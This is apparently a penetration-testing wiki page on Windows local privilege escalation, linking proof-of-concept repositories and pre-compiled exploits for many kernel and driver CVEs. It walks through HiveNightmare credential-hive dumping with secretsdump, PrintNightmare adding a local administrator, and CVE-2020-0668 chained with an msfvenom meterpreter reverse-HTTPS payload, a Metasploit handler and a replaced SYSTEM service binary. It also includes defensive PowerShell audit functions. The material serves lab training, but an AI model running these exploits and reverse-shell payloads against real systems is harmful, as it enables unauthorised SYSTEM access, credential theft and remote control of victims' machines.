# Kernel / Drivers Exploits


## All LPE exploits starting from 2023

{% content-ref url="/pages/UObxQ6Hmpn4gL0hZ8nAN" %}
[Exploit CVE](/0xss0rz/pentest/privilege-escalation/windows/exploit-cve.md)
{% endcontent-ref %}

## CVE-2024-49138

Tested on **Windows 11 23h2**.

{% embed url="https://github.com/MrAle98/CVE-2024-49138-POC" %}

## CVE-2024-38193

Tested on Windows 11 Pro 23H2 (build 22631.3447).

{% embed url="https://github.com/killvxk/CVE-2024-38193-Nephster" %}

## CVE-2024-35250 - Untrusted Pointer Dereference in the ks.sys driver

{% embed url="https://github.com/varwara/CVE-2024-35250?s=03" %}

## CVE-2024-30088

{% embed url="https://github.com/tykawaii98/CVE-2024-30088" %}

## CVE-2024-30085

Affected versions: Windows 11 23H2

{% embed url="https://github.com/Adamkadaban/CVE-2024-30085" %}

## CVE-2024-30090 - LPE PoC

{% embed url="https://github.com/Dor00tkit/CVE-2024-30090" %}

## CLFS PE - Windows 11

{% embed url="https://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/" %}

## CVE-2023-21752 - Critical

{% embed url="https://github.com/Wh04m1001/CVE-2023-21752" %}

{% embed url="https://www.exploit-db.com/exploits/51203" %}

## CVE-2023-36874

{% embed url="https://github.com/Wh04m1001/CVE-2023-36874" %}

## CVE-2023-36802

Windows 11 22H2 systems.

{% embed url="https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802" %}

## CVE-2023-29360

Exploit targeting the MSKSSRV.SYS driver.

{% embed url="https://github.com/Nero22k/cve-2023-29360" %}

## CVE-2023-28252

Works on Windows 11 21H2 with `clfs.sys` version 10.0.22000.1574; also works on Windows 10 21H2, Windows 10 22H2, Windows 11 22H2 and Windows Server 2022.

{% embed url="https://github.com/duck-sec/CVE-2023-28252-Compiled-exe" %}

{% embed url="https://github.com/fortra/CVE-2023-28252" %}

## CVE-2023-21768

{% embed url="https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768" %}

## CVE-2022-21882

Tested on Windows 20H2 (build 19042.1415).

{% embed url="https://github.com/KaLendsi/CVE-2022-21882" %}

{% embed url="https://github.com/L4ys/CVE-2022-21882" %}

## Notable Vulnerabilities

### MS08-067

Affects Windows Server 2000, 2003, and 2008, and Windows XP and Vista; it allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

{% embed url="https://0xdf.gitlab.io/2019/02/21/htb-legacy.html" %}

### MS17-010

SMBv1 protocol mishandles packets specially crafted by an attacker, leading to arbitrary code execution on the target host as the SYSTEM account.

{% embed url="https://0xdf.gitlab.io/2021/05/11/htb-blue.html" %}

{% content-ref url="/pages/I4NRzgXjYAqaVdEvyCaO" %}
[Windows Exploit](/0xss0rz/pentest/internal-pentest/windows-exploit.md)
{% endcontent-ref %}

### ALPC Task Scheduler 0-Day

{% embed url="https://blog.grimm-co.com/2020/05/alpc-task-scheduler-0-day.html" %}

{% embed url="https://snowscan.io/htb-writeup-hackback/" %}

### CVE-2021-36934 HiveNightmare, aka SeriousSam

A Windows 10 flaw that gives ANY user, regardless of privilege level, the right to read the Windows registry hives and access the sensitive information in them. Researchers quickly developed a PoC exploit that reads the SAM, SYSTEM, and SECURITY registry hives and writes copies of them to disk, so they can be processed offline to extract password hashes (including the local admin's) with a tool such as SecretsDump.py.

#### Detection

{% embed url="https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1" %}

**Checking Permissions on the SAM File**

```cmd-session
C:\htb> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
```

The SAM file is readable (`RX`) by the `BUILTIN\Users` group.
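The `icacls` check above can be scripted so it covers all three hives and the shadow copies at once. The function below is an added example, not the `Mitigation.ps1` script linked above: it reads each hive's DACL with `Get-Acl` (reading a DACL needs only `READ_CONTROL`, which the exclusive lock on the live hive does not block), flags any allow-ACE granting `ReadData` to a low-privileged principal, and counts VSS shadow copies, since the PoC reads the hive copy inside a shadow volume rather than the locked live file. The list of low-privileged principals is an assumption you can extend.

```powershell
# Added example (not the Mitigation.ps1 script linked above): reports whether the
# on-disk registry hives grant read access to low-privileged principals and whether
# VSS shadow copies exist. Both conditions together are what the HiveNightmare PoC
# relies on: the live hive is locked, so it reads the copy inside a shadow volume.
function Test-HiveNightmareExposure {
    [CmdletBinding()]
    param(
        # Principals that should never be able to read the hives (assumed list)
        [string[]]$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    )

    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData

    $findings = foreach ($name in 'SAM', 'SYSTEM', 'SECURITY') {
        $hive = Join-Path $env:SystemRoot "System32\config\$name"
        # Reading the DACL needs READ_CONTROL only, so this works as a standard user
        $acl = Get-Acl -LiteralPath $hive -ErrorAction SilentlyContinue
        $exposed = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            (($_.FileSystemRights -band $readData) -ne 0)
        })
        [pscustomobject]@{
            Hive      = $hive
            Exposed   = $exposed.Count -gt 0
            Principal = ($exposed.IdentityReference.Value -join ', ')
        }
    }

    # Shadow copies are what the PoC actually reads from
    $shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        HiveFindings    = $findings
        ShadowCopyCount = $shadows.Count
        Vulnerable      = (@($findings | Where-Object Exposed).Count -gt 0) -and ($shadows.Count -gt 0)
    }
}

Test-HiveNightmareExposure | Format-List
```

A host with `Exposed = True` on any hive but `ShadowCopyCount = 0` still has the bad ACL and becomes exploitable as soon as a restore point or backup creates a shadow copy. Microsoft's published workaround for this CVE is to restore the inherited ACLs on `%windir%\system32\config` (`icacls %windir%\system32\config\*.* /inheritance:e`) and then delete the existing shadow copies, which is what the linked `Mitigation.ps1` automates.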

#### Exploit

{% embed url="https://github.com/GossiTheDog/HiveNightmare" %}

{% embed url="https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe" %}

```powershell-session
PS C:\Users\htb-student\Desktop> .\HiveNightmare.exe

HiveNightmare v0.6 - dump registry hives as non-admin users

Specify maximum number of shadows to inspect with parameter if wanted, default is 15.

Running...

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

Success: SAM hive from 2021-08-07 written out to current working directory as SAM-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

Success: SECURITY hive from 2021-08-07 written out to current working directory as SECURITY-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM

Success: SYSTEM hive from 2021-08-07 written out to current working directory as SYSTEM-2021-08-07


Assuming no errors above, you should be able to find hive dump files in current working directory.
```

```shell-session
impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local
```

{% content-ref url="/pages/2bWJOAKkW5kAgsE6acxh" %}
[SAM & LSA secrets](/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets.md)
{% endcontent-ref %}

### CVE-2021-1675/CVE-2021-34527 PrintNightmare

{% content-ref url="/pages/I4NRzgXjYAqaVdEvyCaO" %}
[Windows Exploit](/0xss0rz/pentest/internal-pentest/windows-exploit.md)
{% endcontent-ref %}

#### Remotely

{% embed url="https://github.com/cube0x0/CVE-2021-1675" %}

#### PowerShell

{% embed url="https://github.com/calebstewart/CVE-2021-1675" %}

By default, this script adds a new local admin user, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.

**Checking for Spooler Service**

```powershell-session
PS C:\htb> ls \\localhost\pipe\spoolss


    Directory: \\localhost\pipe


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
                                                  spoolss
```
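Listing `\\localhost\pipe\spoolss` only tells you the spooler is up. Whether a non-admin can push a driver through it also depends on the Point and Print policy values that Microsoft's PrintNightmare hardening guidance covers. The function below is an added example (not part of either PoC linked above) that combines the pipe check with the service state and those registry values and reports the host as exposed only when the spooler is reachable and a weak policy value is explicitly set; the registry path and value names are the documented ones, the combination logic is my own.

```powershell
# Added example (not from the PoCs linked above): checks whether the Print Spooler
# is reachable and whether Point and Print policy leaves driver installation open
# to non-administrators. Registry value names follow Microsoft's hardening guidance.
function Test-SpoolerExposure {
    [CmdletBinding()]
    param(
        [string]$ComputerName = 'localhost'
    )

    # Same named pipe the page lists with ls; the PoCs talk to the spooler through it
    $pipe = Get-ChildItem -Path "\\$ComputerName\pipe\spoolss" -ErrorAction SilentlyContinue

    # Service state is only readable locally; remote hosts just get the pipe check
    $service = if ($ComputerName -eq 'localhost') { Get-Service -Name Spooler -ErrorAction SilentlyContinue }

    $ppKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pp = Get-ItemProperty -Path $ppKey -ErrorAction SilentlyContinue

    $weak = @()
    # 1 = no warning and no elevation prompt when a non-admin installs a driver
    if ($pp.NoWarningNoElevationOnInstall -eq 1) { $weak += 'NoWarningNoElevationOnInstall=1' }
    # non-zero = warning and/or elevation prompt suppressed on driver updates
    if ($pp.UpdatePromptSettings -gt 0) { $weak += "UpdatePromptSettings=$($pp.UpdatePromptSettings)" }
    # 0 explicitly re-enables non-admin driver installation after the 2021 hardening
    if ($pp.RestrictDriverInstallationToAdministrators -eq 0) { $weak += 'RestrictDriverInstallationToAdministrators=0' }

    [pscustomobject]@{
        ComputerName   = $ComputerName
        SpoolerStatus  = if ($service) { $service.Status.ToString() } else { 'Unknown' }
        PipeReachable  = [bool]$pipe
        WeakPointPrint = ($weak -join ', ')
        # Reachable spooler plus weak Point and Print policy is what the PoCs depend on
        Exposed        = ([bool]$pipe) -and ($weak.Count -gt 0)
    }
}

Test-SpoolerExposure | Format-List
```

On a host that does not need to print, stopping and disabling the `Spooler` service removes the pipe entirely; where printing is required, the three values above should be absent or set to their restrictive defaults, and `PipeReachable = True` with an empty `WeakPointPrint` is the expected state after patching.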

**Adding Local Admin with PrintNightmare PowerShell PoC**

{% content-ref url="/pages/yrRcYBoyWutmbNvRlNZq" %}
[Bypass Powershell Execution Policy](/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy.md)
{% endcontent-ref %}

```powershell-session
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
```

```powershell-session
PS C:\htb> Import-Module .\CVE-2021-1675.ps1
PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
```

```powershell-session
PS C:\htb> net user hacker

User name                    hacker
Full Name                    hacker
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/9/2021 12:12:01 PM
Password expires             Never
Password changeable          8/9/2021 12:12:01 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.
```

## Enumerating Missing Patches

```powershell-session
PS C:\htb> systeminfo
PS C:\htb> wmic qfe list brief
PS C:\htb> Get-Hotfix
```

We can search for each KB (Microsoft Knowledge Base ID number) in the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000808) to get a better idea of what fixes have been installed and how far behind the system may be on security updates.
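To make the `Get-Hotfix` output actionable, it helps to pair it with the exact build in the `CurrentBuild.UBR` form quoted in the entries above (for example `22631.3447`) and a list of the KBs you expect to be present. The function below is an added example, not part of wesng: the KB list it is called with is constructed for illustration (`KB5000808` is the KB the catalog link above searches for; `KB0000000` is a placeholder that will always show as missing), so substitute the KBs that fix the CVEs relevant to the target build.

```powershell
# Added example (not from wesng): reads the exact build from the registry and reports
# which of a given list of KBs are absent from Get-HotFix.
function Get-MissingHotfix {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string[]]$RequiredKB
    )

    $cv = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $hotfixes = @(Get-HotFix)
    $installed = @($hotfixes | Select-Object -ExpandProperty HotFixID)
    $lastInstalled = $hotfixes | Where-Object InstalledOn |
        Sort-Object InstalledOn -Descending | Select-Object -First 1

    # Normalise "5000808" or "kb5000808" to the KBnnnnnnn form Get-HotFix reports
    $required = $RequiredKB | ForEach-Object {
        if ($_ -match '^\d+$') { "KB$_" } else { $_.ToUpper() }
    }

    [pscustomobject]@{
        Product        = $cv.ProductName
        DisplayVersion = $cv.DisplayVersion        # e.g. 23H2 (present on Windows 10 20H2 and later)
        Build          = "$($cv.CurrentBuild).$($cv.UBR)"
        HotfixCount    = $installed.Count
        LastHotfix     = $lastInstalled.HotFixID
        LastHotfixDate = $lastInstalled.InstalledOn
        MissingKB      = @($required | Where-Object { $installed -notcontains $_ })
    }
}

# Constructed input: KB5000808 from the catalog link above, KB0000000 as a placeholder
Get-MissingHotfix -RequiredKB 'KB5000808', 'KB0000000' | Format-List
```

One caveat when reading `MissingKB`: `Get-Hotfix` (Win32_QuickFixEngineering) lists the cumulative updates that are currently registered, and a newer cumulative update supersedes older ones, so an older KB being absent does not by itself prove the fix is missing. Compare `Build` against the fixed build listed in the Update Catalog entry for the KB before concluding that a CVE is unpatched; that is the comparison wesng automates against its vulnerability database.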

{% embed url="https://github.com/bitsadmin/wesng" %}

## CVE-2020-0668 Example

{% embed url="https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/" %}

```cmd-session
C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
```

{% embed url="https://github.com/RedCursorSecurityConsulting/CVE-2020-0668" %}

Building the solution should create the following files.

```shell-session
CVE-2020-0668.exe
CVE-2020-0668.exe.config
CVE-2020-0668.pdb
NtApiDotNet.dll
NtApiDotNet.xml
```

Pre-compiled:

{% embed url="https://github.com/0xSs0rZ/Windows_Exploit" %}

{% embed url="https://mega.nz/folder/OU1zSAiT#OzrguEdGb3NOqDrayePTRw" %}

We can use the exploit to create a file of our choosing in a protected folder such as C:\Windows\System32. We aren't able to overwrite any protected Windows files. This privileged file write needs to be chained with another vulnerability, such as [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [DiagHub](https://github.com/xct/diaghub) to load the DLL and escalate our privileges. However, the UsoDllLoader technique may not work if Windows Updates are pending or currently being installed, and the DiagHub service may not be available.

We can also look for third-party software that can be leveraged, such as the Mozilla Maintenance Service. This service runs in the context of SYSTEM and is startable by unprivileged users. The (non-system-protected) binary for this service is located below.

* `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe`

```cmd-session
C:\htb> icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                          BUILTIN\Administrators:(I)(F)
                                                                          BUILTIN\Users:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files
```
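The Mozilla Maintenance Service is attractive here for two reasons the text names: its binary lives outside the Windows directory, so it is not covered by Windows Resource Protection, and unprivileged users may start the service. The function below is an added example (not from the CVE-2020-0668 write-up or PoC) that audits every service running as `LocalSystem` for those properties: it extracts the executable from the service `PathName`, checks whether it is outside `%SystemRoot%` or has write-type rights granted to low-privileged principals, and parses the service's own DACL from `sc.exe sdshow` for `RP` (`SERVICE_START`) or `GA` granted to Users, Authenticated Users, Everyone or Interactive. The principal lists and the regex for service ACEs (only access-allowed ACEs with no inheritance flags, which is how service DACLs are normally written) are assumptions of the example.

```powershell
# Added example (not from the CVE-2020-0668 write-up or PoC): lists services running
# as LocalSystem whose binary is outside the Windows directory or writable by
# low-privileged principals, and whether such users may start the service.
function Get-WeakSystemService {
    [CmdletBinding()]
    param(
        # Principals whose write access to a SYSTEM service binary is a finding (assumed list)
        [string[]]$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'),
        # SDDL abbreviations for the same groups: Users, Authenticated Users, Everyone, Interactive
        [string[]]$LowPrivSddlSids = @('BU', 'AU', 'WD', 'IU')
    )

    # Rights that allow rewriting or replacing the binary
    $writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

    $systemServices = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName }

    foreach ($svc in $systemServices) {
        # PathName may be quoted and carry arguments; keep the executable only
        if ($svc.PathName -notmatch '^"?([^"]+?\.exe)') { continue }
        $exe = $Matches[1]
        if (-not (Test-Path -LiteralPath $exe)) { continue }

        # Binaries under %SystemRoot% are covered by Windows Resource Protection
        $outsideWindir = -not $exe.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase)

        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        $writable = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            (($_.FileSystemRights -band $writeMask) -ne 0)
        })

        # Service DACL as SDDL; RP = SERVICE_START, GA = GENERIC_ALL
        $sddl = (& sc.exe sdshow $svc.Name) -join ''
        $startable = @([regex]::Matches($sddl, '\(A;;([A-Z]+);;;([A-Z]{2})\)') | Where-Object {
            ($_.Groups[1].Value -match 'RP|GA') -and ($LowPrivSddlSids -contains $_.Groups[2].Value)
        })

        if ($outsideWindir -or $writable.Count -gt 0) {
            [pscustomobject]@{
                Service       = $svc.Name
                Binary        = $exe
                OutsideWindir = $outsideWindir
                WritableBy    = ($writable.IdentityReference.Value -join ', ')
                UserStartable = $startable.Count -gt 0
            }
        }
    }
}

Get-WeakSystemService | Sort-Object UserStartable -Descending | Format-Table -AutoSize
```

Before the exploit runs, the Mozilla service in the listing above shows up with `OutsideWindir = True`, an empty `WritableBy` and `UserStartable = True`; after the arbitrary file write it also reports `WritableBy = WINLPE-WS02\htb-student`, which is the state a defender should alert on. Rows with `OutsideWindir = True` and `UserStartable = True` are the candidates an attacker with any privileged file-write primitive would pick, so they are worth reviewing even when the ACL is currently clean.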

### **Generating Malicious Binary**

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe
```

### **Running the Exploit**

```cmd-session
C:\htb> C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"                                       

[+] Moving C:\Users\htb-student\Desktop\maintenanceservice.exe to C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

[+] Mounting \RPC Control onto C:\Users\htb-student\AppData\Local\Temp\nzrghuxz.leo
[+] Creating symbol links
[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.
[+] Sleeping for 5 seconds so the changes take effect
[+] Writing phonebook file to C:\Users\htb-student\AppData\Local\Temp\179739c5-5060-4088-a3e7-57c7e83a0828.pbk
[+] Cleaning up
[+] Done!
```

```cmd-session
C:\htb> icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe'

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(F)
                                                                          BUILTIN\Administrators:(F)
                                                                          WINLPE-WS02\htb-student:(F)
```

### **Replacing File with Malicious Binary**

```cmd-session
C:\htb> copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

### Exploitation

```shell-session
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <our_ip>
set LPORT 8443
exploit
```

```shell-session
sudo msfconsole -r handler.rc 
```

```cmd-session
C:\htb> net start MozillaMaintenance 
```


